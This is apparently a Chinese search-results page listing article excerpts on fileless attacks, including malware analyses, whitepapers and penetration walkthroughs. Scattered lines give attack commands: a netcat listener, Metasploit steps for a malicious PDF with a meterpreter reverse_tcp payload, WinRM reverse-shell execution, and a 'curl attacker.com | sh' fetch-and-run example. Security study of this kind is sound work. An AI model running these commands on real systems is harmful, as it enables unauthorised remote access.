- 综合排序
- 最热优先
- 最新优先
浅谈无文件攻击
浅谈无文件攻击简介与大多数恶意软件不同,“无文件”攻击并不会在目标计算机的硬盘中留下蛛丝马迹,而是直接将恶意代码写入内存或注册表中。由于没有病毒文件,传统基于文件扫描的防病毒软件很难侦测到它们的存在。 然而,“无文件”攻击的定义已经逐渐扩大化,那些需要依靠文件系统的某些功能来实现激活或驻留的恶意软件也已经包括在了“无文件”攻击的范畴中。无文件攻击属于高级持续性威胁(APT)的一种。 APT在无文件攻击之外,还包括0day漏洞利用、缓冲区溢出攻击、傀儡进程等基于内存的攻击,同时还包括内存webshell等攻击,这些攻击可以轻松绕过现有的安全防护体系,将恶意代码悄无声息地植入内存中。 利用注册表利用缓冲区漏洞的无文件攻击有一个弊端就是一旦进程或系统关闭,恶意攻击也就不复存在。 使用内存取证技术,分析内存中的恶意代码,提取攻击的特征和证据,追踪攻击的来源和目的。无文件攻击是一种隐蔽而危险的攻击方式,需要我们提高警惕,加强防护,及时应对。
89710编辑于 2024-03-21- 来自专栏网络安全攻防
无文件落地攻击
文章前言 所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。 Step 3:在攻击主机上使用nc监听端口 nc -lvp 6666 ? 在无文件落地攻击中的利用方式进行介绍,具体方法如下(至于进程隐藏有兴趣的可以自我查找一番): Step 1:运行JSRat监听本地5678端口 . 知识拓展 这里介绍一种在内网中常用的无文件落地攻击方法——WinRM无文件落地攻击!!! Windows Server 2012中通过WinRM实施无文件攻击,最终返回一个新的具备较高隐藏度的Windows Sever 2012的shell给我们的攻击主机,以供对内网进行深入拓展和利用 攻击步骤
2.4K40发布于 2021-07-21 - 来自专栏FreeBuf
浅析无文件攻击
写在前面的话 在信息安全领域中,“无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时,不会在目标主机的磁盘上写入任何的恶意文件,因此而得名“无文件攻击”。 接下来,我们一起分析一下无文件攻击所采用的攻击方法以及策略,我们会对无文件攻击所涉及到的特定技术进行介绍,并解释为什么这种攻击方式在大多数情况下不会被安全防御系统发现。 3、 文档还可以执行恶意攻击流程并实现初始感染。 3、 脚本可以更加方便攻击者将攻击逻辑分散到多个攻击步骤中实现,以躲避某些基于行为分析的安全检测机制。 4、 可以通过代码混淆来增加安全分析的难度,并绕过反病毒技术。 ? 虽然在现代网络攻击活动中,无文件攻击只是其中的一种攻击技术,但很多恶意软件一般都会引入一些“无文件攻击”技术来尝试躲避安全产品的检测。
1.1K30发布于 2018-12-28 - 来自专栏FreeBuf
「无文件」攻击方式渗透实验
前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》,觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式。 这套环境里面的192.168.1.108是黑客的kali攻击机,192.168.1.212是黑客的windows攻击机 科普下nishang和PowerSploit 1、Nishang是基于PowerShell 我先把https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1 * 科普一下csrf的攻击:CSRF:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF,简单来说攻击者盗用了你的身份,以你的名义发送恶意请求 ,还有Powershelltricks::Code Execution & Process Injection 要是实现这个前提条件是: 1.你要有源码 2.源码必须是c++编写,c#编写的一律崩溃 3.
2.7K90发布于 2018-02-23 - 来自专栏FreeBuf
CrowdStrike | 无文件攻击白皮书
3)一旦实现初步突破,对手就可以依赖操作系统本身提供的工具,如Windows管理工具和Windows PowerShell,以执行进一步的操作,而不必将文件保存到磁盘。 04 为何传统技术无法抵御无文件攻击 由于传统安全解决方案极难检测到无文件攻击,因此无文件攻击正在增加。让我们来看看,为什么当今市场上的一些端点保护技术,对这些无恶意软件入侵如此脆弱。 但是我们已经注意到,在无文件攻击中,没有要分析的文件,因此ML无法提供帮助。 3)白名单方法包括列出一台机器上所有良好的进程,以防止未知进程执行。 图3-威胁图的工作原理 下表进一步梳理了威胁图的主要特性: ? 3)攻击指标(IOA)vs.
4.2K41发布于 2020-11-06 - 来自专栏洛米唯熊
利用WinRM实现内网无文件攻击反弹shell
用Administrator账户登录攻击机器 前提知道被攻击方的用户登录账户密码 Windows操作系统中,默认是开启共享IPC$的 IP:192.168.124.30(server2016) IP :192.168.124.20(win7) IP:192.168.124.32(Kali) 0x02:攻击过程 ---- 一、快速在(server2016)运行winrm 命令:winrmquickconfig 成功 三、在(win7)中需要被远程访问的文件,开启文件共享。 ? 开启共享文件夹,并添加访问用户的权限,使其能够远程访问。 3、kali启动监听shell模式 ? 五、利用(server2016)的WinRM 实现内网无文件攻击反弹shell 1、在(server2016)中执行以下命令 winrm invoke create wmicimv2/win32_process
1.5K20发布于 2019-08-29 - 来自专栏黑白天安全团队
常见的windows下无文件落地攻击手法
什么是无文件攻击? 无文件落地攻击流程: 1.远程加载恶意脚本 2.注入内存 3.写入注册表(或者自运行) 恶意脚本执行加载都不会在磁盘驱动器中留下文件,那么可以消除将传统的恶意软件PE(可移植可执行文件)复制到磁盘驱动器的传统步骤来逃避检测 无文件下对抗传统杀毒软件(AV) 这里我们可以看看一下CrowdStrike中《无文件攻击白皮书》分析的”为何传统技术无法抵御无文件攻击“来快速理解一下无文件落地的意义: 由于传统安全解决方案极难检测到无文件攻击 ,因此无文件攻击正在增加。 但是我们已经注意到,在无文件攻击中,没有要分析的文件,因此ML无法提供帮助。 3)白名单方法包括列出一台机器上所有良好的进程,以防止未知进程执行。
7.5K21发布于 2021-03-16 无文件攻击不再隐形,Trellix NDR + Wise 揭示攻击路径并引导修复
无文件横向移动,隐藏于系统信任之中的威胁网络攻击者的战术不断演变,试图绕过安全供应商的防护。如今的攻击者不再依赖传统的恶意软件,而是以“无文件”方式,利用受信任的系统组件,在网络中横向移动。 这种无文件横向移动,用传统的、仅监控终端或文件的安全解决方案很难检测到。攻击者可能使用有效凭证、避免写入磁盘,并伪装成正常的管理行为,使其操作看起来毫无异常。 即使是无文件攻击,也会在网络中留下痕迹。Trellix NDR 可以检测到异常的流量模式、配置错误的服务、可疑的横向移动行为。 攻击者利用服务注册表项的权限配置缺陷(T1574.011),劫持执行流程图 3 展示了一个横向移动攻击场景。设想某企业中,一名用户成为钓鱼邮件或被入侵网站的受害者。 图11:执行恶意载荷并将攻击者添加到管理员组图 12 展示了一个使用 SCShell 实现无文件横向移动的示例。
24710编辑于 2025-10-22- 来自专栏FreeBuf
揭秘基于注册表隐藏的无文件攻击
*本文原创作者:ArkTeam 发展 一直以来,文件是恶意代码存在的最常见形式,安全软件也通常把磁盘上的文件作为重点检测对象。然而,一旦恶意代码以无文件形式存储在系统中,便难以对其追踪。 早在十几年前,红色代码、Slammer蠕虫就利用缓冲区溢出进行攻击,通过网络传播,完全存在于内存之中,而不以文件作为载体。 不过,这种基于内存的无文件(Fileless)攻击一旦进程或系统关闭,也就不复存在。 随后,多款恶意程序甚至APT组织使用这种无文件持久化攻击技术。 ? 攻击流程 ? 结束语 基于注册表的无文件攻击利用操作系统特性来达到数据隐藏的意图,并将恶意程序运行在合法进程之中,这种方式能让基于文件监测的查杀手段失效,为此安全厂商们也积极做出响应,然而随着技术的进一步发展,恶意代码的隐藏方式很可能并不只局限于
2.1K50发布于 2018-02-08 - 来自专栏公共互联网反网络钓鱼(APCN)
基于SVG文件的新型无文件攻击路径分析与防御体系构建研究
然而,其内嵌脚本与动态加载能力亦被攻击者利用,形成一种新型的“双用途”攻击载体。近期VirusTotal平台披露44个零检测恶意SVG样本,暴露了传统安全检测机制在图像类文件处理上的结构性盲区。 本文系统分析此类攻击的技术原理、传播路径与规避机制,指出其利用内联脚本、事件触发与资源外链实现无文件载荷投递的攻击范式。 关键词: SVG安全;无文件攻击;零检测样本;内容安全策略;攻击检测盲区;网络安全防御1. 引言在现代网络安全防御体系中,文件类型识别与恶意代码扫描是威胁检测的基础环节。 规避检测机制:文件扩展名为.svg,MIME类型为image/svg+xml,多数安全代理默认信任;内容为纯文本,无PE结构或典型恶意文件特征;脚本经混淆或延迟执行,静态扫描难以识别语义。 3.
39610编辑于 2025-10-30 - 来自专栏FreeBuf
SQL Server Transact-SQL 的无文件攻击姿势
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。 排查过程 排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行: ? ? 顺手逛一下查杀到恶意exe文件的目录,发现两个dvr后缀的文件,打开一看果不其然,包含了用于下载恶意文件的命令: ? ? 病毒文件分析 将十六进制数据拷贝出来转换为PE文件,是一个用C#编写的DLL文件,通过MyDownloadFile方法读取指定URL网页的内容: ? 3. SQL Server使用强密码; 4.深信服为广大用户免费提供查杀工具,可下载如下工具,进行检测查杀。
1.3K10发布于 2019-05-21 - 来自专栏Khan安全团队
无文件PELoader
https://github.com/TheD1rkMtr/FilelessPELoader
65830编辑于 2023-02-23 - 来自专栏渗透云笔记
PDF文件攻击
调用模块 use exploit/windows/fileformat/adobe_cooltype_sing/ 3. 回弹一个tcp连接 set payload windows/meterpreter/reverse_tcp 3. 3.查看连接状态 netstat -a ? 至此整个过程结束,成功拿到shell。 但这类漏洞因为PDF沙箱的原因也有着很大的局限性,往往是需要配合系统的提权漏洞一起使用才能进行完整的攻击过程,所以投入的成本较高在这几年来出现的完整攻击样本较少。 所以平时要小心陌生的文件,在打开前要明确来源,或使用杀毒软件进行杀毒。尽量保证电脑的软件处于最新版本,这样才能最大程度较低被攻击的概率。
2.9K30发布于 2020-03-12 - 来自专栏Python和安全那些事
恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)
这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢! 受感染的文本编辑器notepad++ [译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击) 声明:本人坚决反对利用工具或渗透技术进行犯罪的行为,一切犯罪行为必将受到严惩 、search.dat、find.bat 发起RokRAT无文件攻击,利用云端API收集用户信息 更详细的描述如下: (1)当LNK文件被执行时,它会运行PowerShell命令来创建并执行一个合法的文档文件 如下图所示,创建了一个韩文的合法文档,旨在干扰被攻击者。 (2)随后,它在%public%文件夹中创建了3个文件。 接着,“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。
91110编辑于 2024-05-17 - 来自专栏安全领域
关于新型的无文件网络攻击,你需要知道的5件事
这些攻击有着许多的名字,“无文件攻击”是最常见的一种方式,但也会用"非恶意软件攻击"和"伪装攻击"(适应性攻击)。 所以,这些攻击很快就成为了IT和信息安全专业人员的头号威胁。 为了更加清楚了解无文件攻击的构成和工作原理,下面是每个业务负责人应该知道的5件事: 1.无文件攻击利用的是网络端口安全上的一个基本漏洞。 由于这些工具具有合法的使用案例,因此它们被攻击者利用在升级权限时隐藏在检测范围内,在整个网络中横向移动过程中,通过更改注册表来实现持久性。 3.无文件攻击可以涉及文件。 从这里开始,攻击者使用PowerShell直接在内存中执行恶意代码,使得攻击真正无文件化。 5.预防无文件攻击。 虽然无文件技术极难检测,但可以采取一些措施来保护业务并降低风险。好的第一步是禁用组织未主动使用的管理工具,或者至少限制其权限和功能。
70220发布于 2018-08-01 - 来自专栏前沿安全技术
针对Model X无钥匙系统的远程攻击
本研究是针对特斯拉 Model X 无钥匙系统的实用安全评估。所分析的无钥匙系统采用了由通用标准认证的安全元件实现的安全对称密钥和公钥密码原语。 这些示例表明,Model X遥控钥匙上的OAD服务缺陷可能允许攻击者覆盖固件并获得远程代码执行。Toolbox 软件可以用于更新遥控钥匙固件,因此它包含了最新固件二进制文件的备份。 从这个实验中可以清楚地看出,遥控钥匙没有验证提供的固件二进制文件的真实性。这种不安全的固件更新(或 OAD)实现允许攻击者覆盖 CC2541 SoC 执行的固件。 3.使用 APDU 服务从安全元件请求 RKE 解锁令牌。4.使用获得的解锁令牌解锁汽车。5.连接到诊断连接器并将遥控钥匙与汽车配对。6.攻击者现在有新钥匙可以用来解锁和启动汽车,就像原来的钥匙一样。 生成恶意固件映像后,更新了 CRC 和 SHA1 哈希以获得有效的固件二进制文件,该文件可以在攻击的第二步中与 OAD 一起使用。
1.4K31编辑于 2023-06-24 - 来自专栏FreeBuf
无文件加密挖矿软件GhostMiner
早在2017年,已经观察到他们如何应用无文件技术使检测和监测更加困难。 8月观察到一个名为ghostminer的无文件加密货币挖掘恶意软件,该软件利用无文件技术和windows管理工具(wmi)。 还观察到GhostMiner 变体修改了被Mykings、PowerGhost、PCASTLE和BuleHub等感染的主机文件。 除了上述功能外,命令脚本还有一个wmi_killer函数,该函数终止正在运行的进程,并删除与恶意软件系相关联的计划任务和服务,例如: 1.Mykings 2.PowerGhost 3.PCASTLE 4 另一个命令脚本函数wmi_checkhosts能够修改受感染计算机的主机文件。 ? 同时,ccbot使用两个ip地址,即118.24.63.208和103.105.59.68作为c&c服务器。 然后ghostminer将追加2130字节的随机值,该文件将保存为C:\windows\temp\lsass.exe。 恶意软件随后将执行以下命令: ? IOCs ?
1.8K00发布于 2019-10-10 - 来自专栏卓越笔记
Linux scp 无密码复制文件
目的:本地服务器(local)复制文件到远程服务器(remote) 本地服务器:local 远程服务器:remote (192.168.1.254) 1. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 2. 在 /root/.ssh 下复制备份一份 id_rsa.pub 命名为 id_rsa.pub.L 3. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 4. 然后在 local 上就可以无密码使用 scp 复制文件到 remote 了(scp <file> root@192.168.1.254:/home/downloads)
6.4K50编辑于 2023-02-18 - 来自专栏FreeBuf
Netwalker无文件勒索软件分析
攻击者正不断研究更复杂的方式逃避恶意软件检测,近期发现攻击者利用PowerShell编写Netwalker勒索软件,直接在内存中执行,没有将实际的勒索软件二进制文件存储到磁盘中。 最后删除副本,防止受害者使用副本恢复文件。 ? 无文件勒索软件分析 Netwalker使用6个随机字符作为扩展名重命名加密文件: ? 它通常会避免对关键文件,可执行文件,动态链接库,注册表或其他与系统相关的文件进行加密,防止系统完全失效。 总结与建议 攻击者现在正在向勒索软件中添加反射DLL注入,从而使攻击难以被安全分析人员分析追踪。勒索软件本身对组织就具有很大的危害,成为无文件攻击后,其风险再次加大。 以下是避免被勒索软件攻击的一些建议: 定期备份关键数据,减轻勒索软件攻击的影响; 安装来自操作系统和第三方供应商的最新软件补丁; 遵守良好的邮件和网站安全规范; 及时发现警告可疑的电子邮件和文件; 在端点上实施应用程序白名单
1.6K20发布于 2020-06-20 - 来自专栏逢魔安全实验室
Linux无文件渗透执行ELF
注:本文仅用于知识分享,请勿用于非法攻击,任何后果与本团队无关。 01 简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/ exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢? 这就是可以被攻击者所利用的,如果有办法将需要执行elf通过memfd_create(2)写入内存中进行执行的话就可以达到我们的目的。 ? 可以看到我们的elf文件最终以匿名文件的方式在内存中被加载执行了,从匿名文件运行的程序与运行于普通文件的程序之间唯一真正的区别是/proc/pid/exe符号链接。
6.5K80发布于 2018-05-15
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号